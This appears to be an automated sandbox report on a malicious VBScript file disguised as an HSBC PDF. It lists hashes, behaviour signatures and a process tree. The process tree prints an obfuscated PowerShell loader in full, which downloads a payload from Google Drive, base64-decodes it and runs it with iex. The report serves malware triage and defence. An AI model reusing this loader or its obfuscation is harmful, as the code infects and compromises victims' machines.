Analysis
-
max time kernel
93s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
18-04-2024 09:49
Static task
static1
Behavioral task
behavioral1
Sample
Hsbc009873042024-pdf.vbe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Hsbc009873042024-pdf.vbe
Resource
win10v2004-20240412-en
General
-
Target
Hsbc009873042024-pdf.vbe
-
Size
206KB
-
MD5
881f0892d33291aec64ee24eecd688c8
-
SHA1
8fab76574605c4e2ad1b6ec17f6b08d902ceabc5
-
SHA256
a54f088c60a0119468c0d9f54ce971826ad8d4ecdc579e1f7f1488caba0b6ca7
-
SHA512
7cf69830969ee4cbb7be997a2cedad3ed62b2a9cad1b567789d61fddd124f283ae1b822245410636db62be6fa635ec246ed6a7c4b9eab5340f74fa0a4917b4ef
-
SSDEEP
6144:IYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfKqzH:x2dOFSk
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 2200 powershell.exe 12 2200 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 7 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2200 powershell.exe 2200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2200 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2760 wrote to memory of 2200 2760 WScript.exe 89 PID 2760 wrote to memory of 2200 2760 WScript.exe 89 PID 2200 wrote to memory of 1140 2200 powershell.exe 91 PID 2200 wrote to memory of 1140 2200 powershell.exe 91
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Hsbc009873042024-pdf.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Chipset = 1;$dobbeltrolle='Substrin';$dobbeltrolle+='g';Function Svarskrivelser($Enigmatically){$Unmathematically=$Enigmatically.Length-$Chipset;For($Septangular=5; $Septangular -lt $Unmathematically; $Septangular+=(6)){$Dnnings+=$Enigmatically.$dobbeltrolle.Invoke($Septangular, $Chipset);}$Dnnings;}function Snderlemmendes($Trailmaker){& ($Svigagtigt) ($Trailmaker);}$Ethnologies242=Svarskrivelser 'Film MWaggooOpholz.dloeiReattl SakrlCaraca nder/Hairl5Desmo.Ambre0Lustr Pret,(RumkaWVrelsiCaf,hnBombidBarhooBy.anwTelevs Ze.a TuninN initT,tbrr Kyklo1Sprin0.urer..ncho0El gi;klips TurneWUnderiHemi.nSadom6 C,ee4Bogru;Dise. MagtxPedss6Cusc 4 Lees;Pomme Virolr YdervKolli: In,e1Boord2tryks1Reine.Gr tt0Kass.)Bista ReligGF rvueeccencChankkBismeoBarba/Affid2 Draa0Tril,1 Votu0 f rz0Merce1Omkl,0 Al s1Comme FjedrFaffroi Kronr HayeeBlackfIsol,oKoh,vx Frug/Gimm 1Trffe2Typhl1Excer.Snirk0B omo ';$Chaetodontid150=Svarskrivelser ' entUfalmnsTous,eNothorP.ees-inte,AEssaygPin reKendenbanaktGallo ';$Uddannelsesaaret=Svarskrivelser ' ieprhLandetLavvot VugapRosses lore:Moder/ Si.k/ udlsdSku tr,askiiWickavTortue outc. RyalgRelstoUdmnto LinjgSeku,l.isceeAshmo. ongcForumoDilemm Sted/HildeuMusqucRoald?skrive Omf.xNgterpMagn oBeskarE ithtNonse= OpspdSulp.oTar.owParkenBraabl Sm,toSpoo,adepladSiniu&Krepei Ho,ld Hex,=h ste1Befa.OI.dusxSemimfSt ikT FaldMImpenSFilloZ.rogriKapitgBagloEEp,grl EnsoT EgnsVUnsp.y.oldarBagflRNickeFUnedif SlagzCaimaU Pi.zOI.munSMalerX T.ejEgutliyAchtoZRube Xgt pafP.oteN Rg e_ ind,ZRockiAtohaa ';$Dicarboxylic=Svarskrivelser ' Tils>,ytmi ';$Svigagtigt=Svarskrivelser 'DanseiInsaleSalpixKlamm ';$Tyfusepidemiernes = Svarskrivelser ' C,paeforsycEff khPodopo.rani Repr,%Unst aKm ehpKnollpN urod achaaKeelstOvergaEntrg% Emig\ OpsySRtensoHor hf P,ovaFangssRebiae eltns arfgbalan.Te,raAApoterCalstbAfg,s Miljv&shewb&Prot UforleFagudcunhouhAvistoA.tip Cafpa$ peri ';Snderlemmendes (Svarskrivelser 'porta$Commug BlislGallooVa,iabHem ha.ranclkabar:TdfyrTPreaco Boa.bIndi,aTvivlc Agosc E.buo Altey,alle=Artio(sven,cVarmemGuddodOr,hi ehaa/.ingacPluvi Vermi$ForraTEnfeeyA.aeuf Al.guigle,sFetloeSkiftp.ildeiPseudd Soloe,racimAabriiMa,ape.jemmrBustenIbisbeMellesGo,ke)G.les ');Snderlemmendes (Svarskrivelser 'I eff$OverdgUegn.lBabooohierabMeta.aJigsalSpool: PraiP Adrea.eboas UdvitTarokiBa,ealLycoplD,ejee Pracr ScounStakke chivsSkind=Botry$dialeUA,petdPa hydWarbla I con tteanIn oreUdboklUs.uesIndereOv.rksDerivaDuftlaPolysrI troeUlnoctValgb.VocatsBrulop Re.elHjb.nibruskt Fr m(Delph$ .eplD Rudii.ndiscca.boaVeri r Hattbovatoo Dia,xukunsyHardwlSlubriTactucUdlnd)Org,n ');$Uddannelsesaaret=$Pastillernes[0];Snderlemmendes (Svarskrivelser 'knk l$Schoog Labol folkoSuperbSidnea tdnlMenne:NodevS Lge uS,iftpNanoseReusalLeo.alOvereevelynxTykhu=HeadsNAkklieTarwewStaff-EncepOMa kebEngirjstrepeKretjcCecidtBeken cycl.SRekrnyP,umasOldentR.moreStortmY,kem.forniNHeruneEft,rt J ng.SkyskWMargeeDesigb C,paCal.balsociaiOmnipeRepatn,repat Four ');Snderlemmendes (Svarskrivelser 'Expan$TornaSZeppeu,utifpJavereagestlfi stl GiroeE.otoxOdorl.SammeHfarineKonkuaMissedPra te CrotrBrancsDek,i[Koens$He.igCThomih P.opaNeuroeEvewetMatieoB.dradTher oAidstn nohatAggrai SudldPukke1Benzo5punch0Ja.ls]fris,=Unide$Ga,coEsrdo,tS.ygahM,rtynGenlsoFluebl S,ikoS lfogOppriiFourie e.igs Mind2Stv.e4Cerem2 Lkke ');$Fjeldrypens=Svarskrivelser 'KtterSChignuNettepEdwi,e RosilSynodlFarveeneofaxsnder.LoebpDTakeooDivelwOutfrnp.gmyl Non.oOrchea BladdHandeFTreogi michl HorseBonto(Ibssk$SgekrUUdtrtdO,tagd Ove aBertsnArioin KosmeAcantlInexps For,eR.cinsTinglaFrad,a,reexr SekseOffentPucke, Livs$SulfoFCitysu Tabem Dagpb ObstlMy,oteLiparr Emub)Benef ';$Fjeldrypens=$Tobaccoy[1]+$Fjeldrypens;$Fumbler=$Tobaccoy[0];Snderlemmendes (Svarskrivelser 'Forsg$ KickgPapirlPandooFngerbLnudba.erobl Smit:DusenKGrounnSolidaSmaarcPhilokU,acuiCashanSeizigMenth=Nabog(Bret TCounteKred.sId,lot.aske-SamarPNodebadenertStrabhCeno. Udspr$fatalF Via,uKilohm P,ilbSyneclA.aloeRevolrAudie)F,rsi ');while (!$Knacking) {Snderlemmendes (Svarskrivelser ' ista$Si gag DrvtlErotioBeheabHjertaCountl utb:KusinT orelaSkankmGuthraSka.fc toreoD.mpeaDanefrWoodte Skyg=Evoc.$.ncontVirusrSamg uCerebeCo it ') ;Snderlemmendes $Fjeldrypens;Snderlemmendes (Svarskrivelser 'CreepSDiuretSoddeaSindsr A,ndtBlo.t-TheseSFlydel.rreleSpineeMo adpFremb Egli4 olla ');Snderlemmendes (Svarskrivelser ' De,e$AsocigGenstl vedboPastibHelvea sa,dlArkss:MicroKDossenStridaGudfrcBlo.pkRecoviNondin LngogNonhi=Bellh(indenTSa.ereAlphasSerestD.spo-preavPbasreaTidsstsyvtih ca p bore$ Spa FHandeucintemFremmbAdresl Mar,eSvrt rDisci) Fish ') ;Snderlemmendes (Svarskrivelser 'Al.or$UnlaugTvanglMindso Gennb Oplaa raftlOverh:s,ipoF ValulN,nceyTunencGynetaHo,kys ExtrtDeeskela enrDisco3Afk l7 Sjle=Try,t$ProfegS alsl U,mao TelebInddaaHaustlBount:B,rntFEu.hau FibrgAse,ttLock,n,lsesib.blinSkalkgIntrae Svlgr Hamisepheb+Endos+Ton.l%Inves$Ups.rPPro eaSvampsVivistTransiIndbrlHjemml,ctroeKo,strPr.menDr,geeT,bslsDe,la.Flossc WilloSpgeru omsknAzimetUnde. ') ;$Uddannelsesaaret=$Pastillernes[$Flycaster37];}Snderlemmendes (Svarskrivelser 'H nde$.ubilg.onotlForhaoSch.obKommaaDirecl Mon.:unconGB,reguunspalFy iolZoopasSvndy ,ect=Coa,m .amspGAkronetrykstAu as-Gra.sC ntimoSla tn GenntDiskoeplecon helutParot ,ost$ProtaFSpiseu eallmDistrb RettlLogjaeOrd.nrUnvis ');Snderlemmendes (Svarskrivelser 'Coman$Tav.sgE.fullSaprooc.shebeartha ogslOmsae:S,mmeP Depaa,tatilAppl a AviccKrydseSurmasKinak Lugej= Ke,s Ghane[ro.maSObstry IsvasAntegt Tione BicomShags.kinglC,ordroDemarn remivDelegeMidalr,orost in.t] Acan: St,d:mala FTine rDeliboImperm FlodB ba kaSpermsMedbre T no6Count4RoseoSGavert.urrirNippeiJaelunVaerkg ndr( Nomi$KommiGByersu TruslSuperlProbasTilke)w.apo ');Snderlemmendes (Svarskrivelser 'Eksam$.illagCytollhydr okamikbPolyaa,pheclVenst:KoilaCSillyySpinosAnonytTheo,ovestbrArverrAbbedhMedboaQ,affpTaalmh Ve,my R gm Bed.m=.forg Upr,[Try,kSguineySemiasduncitRebate ,pasmUplif.AugenTVelbjeGuruexLaquatSk.ma.V nedE TrosnunanicRosemoscl,fdSvkkeiSlumsn For.g,ehea]Lysts:K.nst:ApoloANon,aSfrsteCPlumbI G.ngI esdo. Kle,G Ru feRenovtHygieSCajettGungrrSuperiV rlen RecigLikvi(Bakke$TionoP elleaGodkelPrim,aDuchycDivageAbigesS ged) Mine ');Snderlemmendes (Svarskrivelser 'Model$ AnetgSamarlOrmstoantilbGaiteaWestllFunkl:U ophTRebe,jMaleflEpicoemojarsVirkelhaandsDeproeNderssChamat Tota=Frems$FriskCU.dery,kralsArbejtInteroLegiorathe,rMedsehD.uara alsp Pro hAlfaeySilva.J,lans FribuRumfabLineasBrandtbej.er Ne,ti Rutsn narkg R nd(Obstr3 Cair0To.ac8Enthr5Solis4Modef2 eve, Vima2Twist8C.nfe9 Gens4 Inte2Lumpe) Baan ');Snderlemmendes $Tjleslsest;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sofaseng.Arb && echo $"3⤵PID:1140
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82